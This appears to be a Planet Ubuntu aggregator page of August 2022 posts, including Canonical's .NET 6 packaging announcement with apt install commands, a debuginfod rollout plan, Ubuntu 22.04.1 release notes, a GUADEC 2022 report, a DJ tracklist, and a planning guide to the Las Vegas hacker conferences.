August 16, 2022

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh5.googleusercontent.com/mC_5Nld4NBRCeHkUjhEn5WRjLMOoFjPqYlt5f5RUGZsQNapx7f6GJe3fG9-WAC4eTTgCDTELrcyI6KlEZsqTQCeFGwklJyT_LGBLt9pr5cGiVFaw2QJf9C0h8hwmxnfUNJvaT5RSOXFkms89KVn6yP8" width="720" /> </noscript>
  • .NET developers are now able to install the ASP.NET and .NET SDK and runtimes from Ubuntu 22.04 LTS with a single “apt install” command
  • Canonical releases new, ultra-small OCI-compliant appliance images, without a shell or package manager, for both the .NET 6 LTS and ASP.NET runtimes
  • Microsoft and Canonical are collaborating to secure the software supply chain between .NET and Ubuntu and to provide enterprise-grade support

Canonical is proud to welcome the .NET development platform, one of Microsoft’s earliest contributions to open source projects, as a native experience on Ubuntu hosts and container images, starting in Ubuntu 22.04 LTS.

.NET developers will be able to start their Linux journey with Ubuntu, benefiting from timely security patches and new releases.

.NET 6 users and developers can now install the .NET 6 packages on Ubuntu with a simple apt install dotnet6 command. Optimised, pre-built, ultra-small container images are also now available to use out of the box.

.NET as an Ubuntu .deb package is the result of a close collaboration between Microsoft and Canonical. The two companies are working together to deliver timely security patches and new releases to Ubuntu. This is the foundation for more capabilities to follow for the open-source framework on Ubuntu, for hosts and minimised container images.

“Working with Canonical has enabled us to simultaneously deliver ease of use and improved security to .NET developers,” said Richard Lander, Program Manager, .NET. “The project benefits from Canonical’s leadership in the Linux ecosystem, and from Microsoft’s depth of experience on dev tools and platforms. The result is a combination of in-box packages and container images that will benefit community developers and large Enterprise customers alike through open source.”

“Ubuntu now has an end-to-end story from development to production with ultra-small supported container images, starting with the .NET platform”, said Valentin Viennot, Product Manager, Canonical. “We think it’s a huge improvement for both our communities; collaborating with the .NET team at Microsoft has enabled us to go above and beyond”.

Install .NET 6 on Ubuntu

With this new addition to Canonical’s repositories, installing and keeping .NET and ASP.NET up to date on Ubuntu 22.04 LTS is straightforward:

# quickly install a bundle with both the SDK and the runtime
sudo apt update && sudo apt install dotnet6
# or cherry-pick only the dependencies you need to develop or run
sudo apt install dotnet-sdk-6.0
sudo apt install dotnet-runtime-6.O
sudo apt install aspnetcore-runtime-6.0

Microsoft and Canonical: partnering for security

Software provenance is more critical than ever to all open source consumers. Open-source communities and enterprises both need to be confident in their software dependencies.

Canonical and Microsoft have worked together to share content with each other directly, with no intermediaries. “We now have what’s effectively a zero-distance supply chain for all Canonical assets”, said Richard Lander, .NET Program Manager at Microsoft.

Microsoft recently set up a distro maintainer group for .NET. Canonical is now a member of that group, contributing to secure the software supply chain, from source to packages.

Canonical’s software repositories continue to expand. Over 28,000 packages are already available to date, with exclusive and extended security patching for Ubuntu Pro and Ubuntu Advantage subscribers, as well as free community users.

Timely security patches and releases

.NET and Ubuntu’s long-term supported (LTS) releases take place in different years but are perfectly aligned. The .NET LTS ships in November of odd years and the Ubuntu LTS ships in April of the following even year.

As a result, Ubuntu users will always have a fresh new .NET LTS in each Ubuntu LTS series. This combination is the logical choice for developers and software vendors, combining two secure and stable product releases to form a trusted foundation for their applications. Microsoft and Canonical are committed to working together to make sure that new .NET releases are available with new Ubuntu releases, and that they work well together.

Establishing the shortest trust chain between Microsoft and Canonical has been critical to building this partnership. The result is a straightforward developer experience, and a regular steam of security patches and updates.

Minimal OCI images: chiselling Ubuntu for .NET

The .NET development platform was one of Microsoft’s earliest contributions to open-source projects. Its developer community consists of more than 5 million .NET developers, with many adopting Linux and Linux-based OCI containers at runtime.

Ubuntu has been a popular choice for developers using containers since the first days of Docker. Alongside the launch of .NET on Ubuntu, Canonical is also offering a new type of container images, composing with only the strict set of packages and files required at runtime.

These “chiselled” images – so-called because everything not needed to provide a minimal Ubuntu image optimised for OCI containers has been cut away – address developer feedback around attack surface and image size, without sacrificing Ubuntu’s stability and familiarity.

So far, this process has cut 100MB away, delivering the smallest Ubuntu-based OCI image ever published at less than 6MB (compressed). Canonical’s goal is to deliver the smallest footprint ever achieved in an OCI image, while still providing known and trusted Ubuntu content.

Canonical has released into beta two new Ubuntu-based OCI images for .NET 6, maintained as part of the existing portfolio of LTS images:

These first chiselled Ubuntu images for the .NET and ASP.NET runtimes are also available from Microsoft, from the Microsoft Artifact Registry (MCR).

What’s next?

This project is the first of a series of projects Canonical has planned for .NET and Ubuntu. Read more about this partnership on Microsoft’s blog.

.NET deb packages are now in Ubuntu Jammy 22.04 LTS for the x64 architecture and will soon be available for the Arm64 architecture as well as on all newer Ubuntu releases.

Pre-built container images are already available on the Azure Container Registry and on Docker Hub:

More resources:

on August 16, 2022 12:55 PM

August 15, 2022

Welcome to the Ubuntu Weekly Newsletter, Issue 748 for the week of August 7 – 13, 2022. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

on August 15, 2022 11:12 PM

August 14, 2022

Debuginfod is coming to Ubuntu

Sergio Durigan Junior

These past couple of months I have been working to bring debuginfod to Ubuntu. I thought it would be a good idea to make this post and explain a little bit about what the service is and how I'm planning to deploy it.

A quick recap: what's debuginfod?

Here's a good summary of what debuginfod is:

debuginfod is a new-ish project whose purpose is to serve
ELF/DWARF/source-code information over HTTP.  It is developed under the
elfutils umbrella.  You can find more information about it here:

  https://sourceware.org/elfutils/Debuginfod.html

In a nutshell, by using a debuginfod service you will not need to
install debuginfo (a.k.a. dbgsym) files anymore; the symbols will be
served to GDB (or any other debuginfo consumer that supports debuginfod)
over the network.  Ultimately, this makes the debugging experience much
smoother (I myself never remember the full URL of our debuginfo
repository when I need it).

If you follow the Debian project, you might know that I run their debuginfod service. In fact, the excerpt above was taken from the announcement I made last year, letting the Debian community know that the service was available.

First stage

With more and more GNU/Linux distributions offering a debuginfod service to their users, I strongly believe that Ubuntu cannot afford to stay out of this "party" anymore. Fortunately, I have a manager who not only agrees with me but also turned the right knobs in order to make this project one of my priorities for this development cycle.

The deployment of this service will be made in stages. The first one, whose results are due to be announced in the upcoming weeks, encompasses indexing and serving all of the available debug symbols from the official Ubuntu repository. In other words, the service will serve everything from main, universe and multiverse, from every supported Ubuntu release out there.

This initial (a.k.a. "alpha") stage will also allow us to have an estimate of how much the service is used, so that we can better determine the resources allocated to it.

More down the road

This is just the beginning. In the following cycles, I will be working on a few interesting projects to expand the scope of the service and make it even more useful for the broader Ubuntu community. To give you an idea, here is what is on my plate:

  • Working on the problem of indexing and serving source code as well. This is an interesting problem and I already have some ideas, but it's also challenging and may unfold into more sub-projects. The good news is that a solution for this problem will also be beneficial to Debian.

  • Working with the snap developers to come up with a way to index and serve debug symbols for snaps as well.

  • Improve the integration of the service into Ubuntu. In fact, I have already started working on this by making elfutils (actually, libdebuginfod) install a customized shell snippet to automatically setup access to Ubuntu's debuginfod instance.

As you can see, there's a lot to do. I am happy to be working on this project, and I hope it will be helpful and useful for the Ubuntu community.

on August 14, 2022 04:00 AM

August 12, 2022

The Ubuntu team is pleased to announce the release of Ubuntu 22.04.1 LTS (Long-Term Support) for its Desktop, Server, and Cloud products, as well as other flavours of Ubuntu with long-term support.

As usual, this point release includes many updates, and updated installation media has been provided so that fewer updates will need to be downloaded after installation. These include security updates and corrections for other high-impact bugs, with a focus on maintaining stability and compatibility with Ubuntu 22.04 LTS. 22.04.1 also brings new RISC-V platform support, providing fresh images for the Allwinner Nezha and VisionFive StarFive boards.

Kubuntu 22.04.1 LTS, Ubuntu Budgie 22.04.1 LTS, Ubuntu MATE 22.04.1 LTS, Lubuntu 22.04.1 LTS, Ubuntu Kylin 22.04.1 LTS, Ubuntu Studio 22.04.1 LTS, and Xubuntu 22.04.1 LTS are also now available. More details can be found in their individual release notes (see ‘Official flavours’):

https://discourse.ubuntu.com/t/jammy-jellyfish-release-notes/24668

Maintenance updates will be provided for 5 years for Ubuntu Desktop, Ubuntu Server, Ubuntu Cloud, and Ubuntu Core. All the remaining flavours will be supported for 3 years. Additional security support is available with ESM (Extended Security Maintenance).

To get Ubuntu 22.04.1 LTS

In order to download Ubuntu 22.04.1 LTS, visit:

https://ubuntu.com/download

Users of Ubuntu 20.04 LTS will soon be offered an automatic upgrade to 22.04.1 LTS via Update Manager. For further information about upgrading, see:

https://ubuntu.com/tutorials/upgrading-ubuntu-desktop

As always, upgrades to the latest version of Ubuntu are entirely free of charge.

We recommend that all users read the 22.04.1 LTS release notes, which document caveats and workarounds for known issues, as well as more in-depth notes on the release itself. They are available at:

https://discourse.ubuntu.com/t/jammy-jellyfish-release-notes/24668

If you have a question, or if you think you may have found a bug but aren’t sure, you can try asking in any of the following places:

#ubuntu on irc.libera.chat
https://lists.ubuntu.com/mailman/listinfo/ubuntu-users
https://ubuntuforums.org
https://askubuntu.com

Help Shape Ubuntu

If you would like to help shape Ubuntu, take a look at the list of ways you can participate at:

https://discourse.ubuntu.com/contribute

About Ubuntu

Ubuntu is a full-featured Linux distribution for desktops, laptops, clouds and servers, with a fast and easy installation and regular releases. A tightly-integrated selection of excellent applications is included, and an incredible variety of add-on software is just a few clicks away.

Professional services including support are available from Canonical and hundreds of other companies around the world. For more information about support, visit:

https://ubuntu.com/support

More Information

You can learn more about Ubuntu and about this release on our website listed below:

https://ubuntu.com/

To sign up for future Ubuntu announcements, please subscribe to Ubuntu’s very low volume announcement list at:

https://lists.ubuntu.com/mailman/listinfo/ubuntu-announce

Originally posted to the ubuntu-announce mailing list on Thu Aug 11 13:27:42 UTC 2022 by Łukasz ‘sil2100’ Zemczak on behalf of the Ubuntu Release Team

on August 12, 2022 12:06 PM

The first point release update to Kubuntu 22.04 LTS (Jammy Jellyfish) is out now. This contains all the bug-fixes added to 22.04 since its first release in April 2022. Users of 22.04 can run the normal update procedure to get these bug-fixes.

The first point release is also significant because it is the default upgrade version for users of Kubuntu 20.04 LTS (Focal Fossa).

See the Ubuntu 22.04.1 LTS Release Announcement, the Ubuntu 22.04.1 Release Notes, and the Kubuntu Release Notes.

Download all available released images.

on August 12, 2022 11:34 AM

August 11, 2022

Thanks to all the hard work from our contributors, Lubuntu 22.04.1 LTS has been released. With the codename Jammy Jellyfish, Lubuntu 22.04 is the 22nd release of Lubuntu, the eighth release of Lubuntu with LXQt as the default desktop environment. Support lifespan Lubuntu 22.04 LTS will be supported for 3 years until April 2025. Our […]
on August 11, 2022 02:34 PM

Whether you’re a first-time Linux user, experienced developer, academic researcher or enterprise administrator, Ubuntu 22.04 LTS is the best way to upgrade your creativity, productivity and downtime. Check out our new video to learn more!

The release of Ubuntu 22.04.1 LTS represents the consolidation of fixes and improvements identified during the initial launch of Ubuntu 22.04 LTS and is the first major milestone in our Long Term Support (LTS) commitment to our users.

From today, Ubuntu 22.04.1 LTS is available to download and install from our download page

Users of Ubuntu 20.04 LTS  will shortly be prompted to upgrade to 22.04 LTS directly from their desktop, either automatically or as part of a scheduled update. This is a great time to start exploring Ubuntu 22.04 LTS – to read more on why it’s our best version yet, check out our launch day blog post, or keep reading for a summary of the most exciting developments.

User experience and performance enhancements

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh3.googleusercontent.com/BXWZWH-r-olzmv2tGU0YtFP3Q8fq382blEMDnJmrhLg1tv4WcwhA6K03lQwyGjSNum1hwWYcZ6G88zcK5U9Pl4adX7dgsQkZHH2WZfCpKG9W_MTiwaaSqhY7V5--NwEy95HRbEqQIeiwQpTx-JuWqMM" width="720" /> </noscript>

GNOME 42 delivers a polished and intuitive desktop experience, with new touchpad gestures and power management tools as well as support for triple buffering, which significantly improves performance. Our default browser, Firefox, has also had a number of updates to reduce startup times since the release of 22.04.

Read more about the new features in Ubuntu Desktop 22.04 LTS>

Upgrade your productivity, enjoy your downtime

Development and data science tooling

Ubuntu is the target platform for open source software vendors and community projects. Ubuntu 22.04 LTS ships with the latest toolchains for Python, Rust, Ruby, Go, PHP and Perl, and users get first access to the latest updates for key libraries and packages.

In fields such as data science and machine learning, Ubuntu is the OS of choice for many of the most popular frameworks. This includes OpenCV, TensorFlow, Keras, PyTorch and Kubeflow, as well tools like the NVIDIA data science stack, which enables GPU accelerated data science workloads to be run locally before deploying to the cloud. 

Gaming and content creation 

As the Linux gaming ecosystem continues to expand, Ubuntu remains the most popular Linux OS for gaming. We include the latest NVIDIA drivers and Ubuntu supports key gaming apps, such as our new early access Steam snap, alongside a number of content creation tools including Kdenlive, Discord and OBS Studio.

For game developers, AI/ML researchers and robotics engineers looking for a simulation environment, Ubuntu 22.04 LTS is the recommended Linux distro for the Unreal Engine which is now available to download as a precompiled binary.

Use it on new, certified hardware

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh3.googleusercontent.com/fpuCbKONJy93_CO5jNo6Kj1gDRyEZrXSQg2ykMy1x7uL5LMmzRKF6rFTEBQz8l1fz85q6UcgKVxTqMCx9TVmSLa9rRtHMCrT5oZzQmaQSFH0jDXE-CWvhMnlnReC9Gk9RxSUZJnv8uCm2UVm9TKV-Yc" width="720" /> </noscript>

The Ubuntu certification program partners closely with leading OEMs to certify Ubuntu Desktop across a range of laptops, desktops and workstations. This ensures that Ubuntu Certified devices work out-of-the-box with hardware specific optimisations that are applied whether you purchase a device with Ubuntu preloaded or install Ubuntu after-the-fact.

The first device to be certified for Ubuntu Desktop 22.04 LTS is the Dell XPS 13 Plus Developer Edition, Dell’s most powerful 13-inch laptop.

The Dell XPS Plus 13 Developer edition is available to buy with Ubuntu 22.04 LTS pre-installed this month in the U.S., Canada and select countries across Europe.

Introducing the XPS 13 Plus Developer Edition>

Read more about our certified hardware>

Enterprise-ready with Ubuntu Advantage

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh5.googleusercontent.com/bimwRSMtyTRx2qW-75Ge_mNjd3uw_9cbZv-3h8YMeiy54wG6zyAd_LLxnqf75kqBRtjPynT0QhsZI55QbtRn9i1NsJ_D15Tz7dDtjyF5tj6LPvrxfuox2qonrpIPSNV01tWDnv-v9at_-2m3Vuck-cs" width="720" /> </noscript>

Ubuntu Advantage is Canonical’s comprehensive subscription delivering enterprise-grade security, management tooling, and extended security patching for 10 years. 

Ubuntu 22.04 LTS introduces advanced management options for Ubuntu Advantage subscribers in Microsoft-centric organisations.

New Active Directory integration features ensure that IT managers can use the same tools to manage their Ubuntu and Windows devices. These include extended Group Policy Object support, privilege management and remote script execution via ADSys.

You can get a personal Ubuntu Advantage licence free of charge using your Ubuntu SSO account.

Read more about our Active Directory integration>

Read more about Ubuntu Desktop for organisations>

Get started today

To get started with Ubuntu 22.04 LTS, visit:

Download Ubuntu Desktop>

Install Ubuntu Desktop>

Upgrade Ubuntu Desktop>

To join the conversation and engage with Ubuntu community members around the globe, check out:

Ubuntu Discourse>

Ask Ubuntu>

on August 11, 2022 12:56 PM

E208 Gerardo Lisboa (Parte 2)

Podcast Ubuntu Portugal

Em início de férias, estivemos à conversa com Gerardo Lisboa presidente da ESOP, Associação De Empresas De Software Open Source Portuguesas. Esta é a segunda parte da conversa. Já sabem: oiçam, subscrevam e partilhem!

Apoios

Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal. E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8. Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem. Se estiverem interessados em outros bundles não listados nas notas usem o link https://www.humblebundle.com/?partner=PUP e vão estar também a apoiar-nos.

Atribuição e licenças

Este episódio foi produzido por Diogo Constantino, Miguel e Tiago Carrondo e editado pelo Senhor Podcast. O website é produzido por Tiago Carrondo e o código aberto está licenciado nos termos da Licença MIT. A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License. Este episódio e a imagem utilizada estão licenciados nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

on August 11, 2022 12:00 AM

August 10, 2022

GUADEC 2022

Dylan McCall

I spent a week at GUADEC 2022 in Guadalajara, Mexico. It was an excellent conference, with some good talks, good people, and a delightful hallway track. I think everyone was excited to see each other in person after so long, and for many attendees, this was closer to home than GUADEC has ever been.

For this event, I was sponsored by the GNOME Foundation, so many thanks to them as well as my employer the Endless OS Foundation for both encouraging me to submit a talk and for giving me the opportunity to take off and drink tequila for the week.

For me, the big themes this GUADEC were information resilience, scaling our community, and how these topics fit together.


Introductions

Stepping into the Guadalajara Connectory for the first time, I couldn’t help but feel a little out of place. Everyone was incredibly welcoming, but this was still my first GUADEC, and my first real in-person event with the desktop Linux community in ages.

So, I was happy to come across Jona Azizaj and Justin Flory’s series of thoughtful and inviting workshops on Wednesday morning. These were Icebreakers & Community Social, followed by Unconscious bias & imposter syndrome workshop. They eased my anxiety enough that I wandered off and missed the follow-up (Exploring privilege dynamics workshop), but it looked like a cool session. It was a brilliant idea to put these kinds of sessions right at the start.

The workshop about unconscious bias inspired me to consciously mix up who I was going out for lunch with throughout the week, as I realized how easy it is to create bubbles without thinking about it.

Beyond that, I attended quite a few interesting sessions. It is always fun hearing about bits of the software stack I’m unfamiliar with, so some standouts were Matthias Clasen’s Font rendering in GNOME (YouTube), and David King’s Cheese strings: Webcams, PipeWire and portals (YouTube). Both highly recommended if you are interested in those components, or in learning about some clever things!

But for the most part, this wasn’t a very code-oriented conference for me.

Accessibility, diversity, remote attendance

This was the first hybrid GUADEC after two years of running a virtual-only conference, and I think the format worked very well. The remote-related stuff was smoothly handled in the background. The volunteers in each room did a great job relaying questions from chat so remote attendees were represented during Q&As.

I did wish that those remote attendees — especially the Berlin Mini-GUADEC — were more visible in other contexts. If this format sticks, it would be nice to have a device or two set up so people in different venues can see and interact with each other during the event. After all, it is unlikely that in-person attendees will spend much time looking at chat rooms on their own.

But I definitely like how this looks. I think having good representation for remote attendees is important for accessibility. Pandemic or otherwise. So with that in mind, Robin Tafel’s Keynote: Peeling Vegetables and the Craft of (Software) Inclusivity (YouTube), struck a chord for me. She elegantly explains how making anything more accessible — from vegetable peelers to sidewalks to software — comes back to help all of us in a variety of ways: increased diversity, better designs in general, and — let’s face it — a huge number of people will need accessibility tools at some point in their lives.

“We are temporarily abled.”

Community, ecosystems, and offline content

I especially enjoyed Sri Ramkrishna’s thoughtful talk, GNOME and Sustainability – Ecosystem Management (YouTube). I came away from his session thinking how we don’t just need to recruit GNOME contributors; we need to connect free software ecosystems horizontally. Find those like-minded people in other projects and find places where we can collaborate, even if we aren’t all using GNOME as a desktop environment. For instance, I think we’re doing a great job of this across the freedesktop world, but it’s something we could think about more widely, too.

Who else benefits, or could benefit, from Meson, BuildStream, Flatpak, GJS, and the many other technologies GNOME champions? How can we advocate for these technologies in other communities and use those as bridges for each other’s benefit? How do we get their voices at events like GUADEC, and what stops us from lending our voices to theirs?

“We need to grow and feed our ecosystem, and build relations with other ecosystems.”

So I was pretty excited (mostly anxious, since I needed to use printed notes and there were no podiums, but also excited) to be doing a session with Manuel Quiñones a few hours later: Offline learning with GNOME and Kolibri (YouTube). I’ll write a more detailed blog post about it later on, but I didn’t anticipate quite how neatly our session would fit in with what other people were talking about.

At Endless, we have been working with offline content for a long time. We build custom Endless OS images designed for different contexts, with massive libraries of pre-installed educational resources. Resources like Wikipedia, books, educational games, and more: all selected to empower people with limited connectivity. The trick with offline content is it involves a whole lot of very large files, it needs to be possible to update it, and it needs to be easy to rapidly customize it for different deployments.

That becomes expensive to maintain, which is why we have started working with Kolibri.

Kolibri is an open source platform for offline-first teaching and learning, with a powerful local application and a huge library of freely licensed educational content. Like Endless OS, it is designed for difficult use cases. For example, a community with sporadic internet access can use Kolibri to share Khan Academy videos and exercises, as well as assignments for individual learners, between devices.

Using Kolibri instead of our older in-house solution means we can collaborate with an existing free software project that is dedicated to offline content. In turn, we are learning many interesting lessons as we build the Kolibri desktop app for GNOME. We hope those lessons will feed back into the Kolibri project to improve how it works on other platforms, too.

Giving our talk at GUADEC made me think about how there is a lot to gain when we bring these types of projects together.

The hallway track

Like I wrote earlier, this wasn’t a particularly code-oriented conference for me. I did sit down and poke at Break Timer for a while — in particular, reviving a branch with a GTK 4 port — and I had some nice chats about various other projects people are doing. (GNOME Crosswords was the silent star of the show). But I didn’t find many opportunities to actively collaborate on things. Something to aim for with my next GUADEC.

I wonder if the early 3pm stop each day was a bit of a contributor there, but it did make for some excellent outings, so I’m not complaining. The pictures say a lot!

Everyone here is amazing, humble and kind. I really cannot recommend enough, if you are interested in GNOME, check out GUADEC, or LAS, or another such event. It was tremendously valuable to be here and meet such a wide range of GNOME users and contributors. I came away with a better understanding of what I can do to contribute, and a renewed appreciation for this community.

on August 10, 2022 07:43 PM

August 08, 2022

https://www.mixcloud.com/dholbach/saturday-noon-at-para-yok-festival/

Para Yok Festival! The beautiful summer called for tropical and summery vibes, so that’s what you are going to find here! It was a lovely event and I was looking forward to play some of these tunes for a long time! Thanks a lot to everyone who made this a very special weekend! 💖

Unfortunately the set was fraught with complications - I had to to replace parts of the equipment 💻🎛💥 … and deal with other difficulties in between. Anyway, it’s a bit of a wild mix, but all the tracks are in my favourite category.

  1. Twerking Class Heroes - Hustlin'
  2. Claudia - Deixa Eu Dizer (iZem ReShape)
  3. Mc Loma e as Gêmeas Lacração - Predadora
  4. Thiaguinho MT feat Mila e JS O Mão de Ouro - Tudo OK
  5. MC Ysa - Baile da Colômbia (Brega Funk) (Remix)
  6. Daniel Haaksman - Toma Que Toma (Waldo Squash Remix)
  7. Gang Do Eletro - Pith Bull
  8. Banda Uó - Cremosa
  9. Sofi Tukker - Purple Hat
  10. Nick León - Latigazo
  11. Tribilin Sound - Condorcanqui
  12. – Break –
  13. Omar ؏ - Dola Re Dola
  14. Yendry - Ki-Ki
  15. TNGHT & M.I.A. - BAD GOOOORLS (BAVR RMX)
  16. The Living Graham Bond - Werk
  17. Kalemba - Wegue Wegue (Krafty Kuts Remix)
  18. Zeds Dead - Rumble In The Jungle
  19. Bert On Beats - Arriba
  20. Baja Frequencia - O Galop
  21. Sango - Fica Caladinha (K-Wash Remix)
  22. Castro - Warning
  23. Daniel Haaksman - Copabanana
  24. Dj Djeff e Maskarado - Elegom Bounsa
  25. London Afrobeat Collective - Prime Minister (Captain Planet Remix)
  26. Omar ft Zed Bias - Dancing
  27. Rafi El - Bacanal
  28. The Chemical Brothers - Go (Claude VonStroke Remix)
  29. nicholas ryan gant - Gypsy Woman (Kaytronik Remix Extended Version)
  30. Kurd Maverick - Dancing To (Extended Mix)
  31. Kotelett - I Got Something For You
  32. Sanoi & Rattler - Walking
  33. Dino Lenny - Tokyo (Damon Jee Remix)
  34. Quantic - You Used to Love Me feat. Denitia (Selva Remix)
  35. Psychemagik - Mink & Shoes feat Navid Izadi
  36. Noir & Haze - Around (Solomon remix)
  37. Emanuelle - Italove
on August 08, 2022 06:20 AM

August 04, 2022

E207 Gerardo Lisboa (Parte 1)

Podcast Ubuntu Portugal

Em início de férias, estivemos à conversa com Gerardo Lisboa presidente da ESOP, Associação De Empresas De Software Open Source Portuguesas. Esta é a primeira parte da conversa, para a semana há mais! Já sabem: oiçam, subscrevam e partilhem!

Apoios

Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal. E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8. Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem. Se estiverem interessados em outros bundles não listados nas notas usem o link https://www.humblebundle.com/?partner=PUP e vão estar também a apoiar-nos.

Atribuição e licenças

Este episódio foi produzido por Diogo Constantino, Miguel e Tiago Carrondo e editado pelo Senhor Podcast. O website é produzido por Tiago Carrondo e o código aberto está licenciado nos termos da Licença MIT. A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License. Este episódio e a imagem utilizada estão licenciados nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

on August 04, 2022 12:00 AM

July 20, 2022

It’s that time of year again – Hacker Summer Camp. (Hacker Summer Camp is the ~weeklong period where several of the largest hacker/information security conferences take place in Las Vegas, NV, including DEF CON and Black Hat USA.) This will be the 3rd year in a row where it takes place under the spectre of a worldwide pandemic, and the first one to be fully in-person again. BSidesLV has returned to in-person, DEF CON is in-person only, Black Hat will be in full swing, and Ringzer0 will be offerring in-person trainings. It’s almost enough to forget there’s still an ongoing pandemic.

I did attend last year’s hybrid DEF CON in person, and I’ve been around a few times, so I wanted to share a few tidbits, especially for first timers. Hopefully it’s useful to some of you.

Conferences/Events

  • DEF CON is arguably the penultimate event of the week. By far the largest by attendance, it also brings the greatest variety in hackers to the event. Ranging from students just getting into the scene to seasoned hackers with decades of experience to industry professionals, the networking opportunities are limitless. The talks are generally high quality, though they can be a bit of a mixed bag sometimes. Some will teach/demonstrate great things, and I always find a few worth watching, even if only when they get published on YouTube.

    There are “villages” for every topic and space – voting machines, hardware hacking, Red Teaming, IoT, lockpicking, social engineering, and more. The villages allow niche areas of hacking to showcase their special interests, and are generally run by individuals with a pure passion for their field. If you want to know more about a particular subfield of hacking, there is no better way than finding the right village.

    For the more competitive type, there’s a variety of competitions. In addition to the main “DEF CON CTF”, there’s also typically smaller CTFs in the Contest area or individual villages, so those looking for a challenge can put their skills to the test. Other competitions in the past have included a scavenger hunt, a password cracking competition, a beverage cooling competition, and more.

    In the evening, there’s variety of activities from parties/concerts to “Hacker Jeopardy” – a very mature take on Jeopdardy! with a hacker theme. There’s also plenty of private parties and places to hang out with fellow hackers all evening long.

    You may also hear people refer to “the badge” when talking about admission to the conference. While other conferences usually talk about registration or a ticket and have some boring piece of paper to present as your admission, DEF CON badges have become a work of art. Approximately every other year, the badge is electronic and has microcontrollers and some electronic function. In theory, DEF CON 30 should be a “passive” year, the creators of the badge (MK Factor) have confirmed that it will be electronic this year. (Check out the linked interview if you’re curious.)

    New this year is DEFCON trainings. These are taking place after DEF CON and providing some opportunities to get high-quality training associated with the conference. They’re all 2-day trainings, but they appear to be a good value for money in comparison to many other commercial training offerings.

  • Black Hat is the premiere security industry conference. I differentiate it from a hacking conference in that most of the people who are there will be people who strictly work in the industry and far fewer who are hackers just for the fun of it. Part of this is the cost (at least an order of magnitude more than DEF CON), and part of this is the general atmosphere. Polo shirts are the order of the day instead of black t-shirts and mohawks.

    There’s lots of high-quality technical material, but also a vendor sales floor with all the sales pitches you can possibly imagine. (But this is also where you can get free SWAG and party invites, so it’s not all terrible news.)

    Black Hat also has a multitude of training opportunities. In fact, Black Hat USA is likely the largest single site training event for the information security space each year. There’s trainings for every background and skill level, for all kinds of specialities, and in both 2- and 4-day formats.

  • BSidesLV is the B-Side to Black Hat. A community conference through-and-through, it has many similarities to the DEF CON of many years ago, but with a little more chill attitude. BSides is a great opportunity for new speakers as well as those who want to interact with fellow hackers in a more chill and (slightly) smaller atmosphere – though it’s gotten quite busy itself over the years. BSides takes over all the conference space at the Tuscany, and most of the hotel rooms, so it’s a great opportunity to be completely immersed in the hacker scene.

  • The Diana Initiative is “A conference committed to helping all those underrepresented in Information Security.” In the past, it’s been a 1 day or 1/2 day affair, but now it’s becoming a 2 day event, and I’m so happy to see such an important topic getting more love.

  • Ringzer0 is a training-only event focusing predominantly on reverse engineering and exploitation. It provides a nice alternative to Black Hat trainings (it’s the same days, but an independent event). The trainings offered here seem much more specific than Black Hat trainings, and I’m planning to take one, so I’ll have a review here after the event.

Planning

The biggest single piece of advice I can offer is: don’t try to do everything. You can’t do it, and managing your energy is actually an important part of the week, especially if you’re attending multiple of the conferences during the week.

Beyond that, I encourage you to think about what you hope to get out of your time. If you’d like to try out contests, pick out one or maybe two and focus on them. If you’re looking for a new role or wanting to meet new people, find social opportunities. If you’re looking to expand your skills in a particular direction, identify all of the relevant content in the area.

I’ve had years where I tried to do too much and ended the week feeling I’d done nothing at all. I typically prioritize interactive events – contests, meeting people, etc., – over talks, because the talks will be recorded and available later, unless the talk is something I plan to immediately apply. At the bigger events (DEF CON and Black Hat) the audience is likely to be so large that even if you have questions, it will be hard to get them answered by the speaker.

Logistics

Quite frankly, the best time to plan hotel and airfare has probably already passed, but the 2nd best time to plan them is right now. I expect both will only rise in price from this point forward. Unfortunately, prices have been very volatile this summer. As of writing, the following group rates for hotels are still available:

  • DEF CON Room Block – Note that this year, DEF CON is at Caesar’s Forum, which is a new conference center located behind the Linq and Harrah’s. (It is attached to these two hotels by a skybridge.)
  • The Tuscany is the off-strip resort that hosts BSidesLV. They still have a number of rooms available, and most of the guests at the hotel will be fellow hackers during the course of the week.
  • Black Hat has rates at the Mandalay Bay. I’d only recommend this if you’ll be attending Black Hat, however, as it’s at the far south end of the strip.
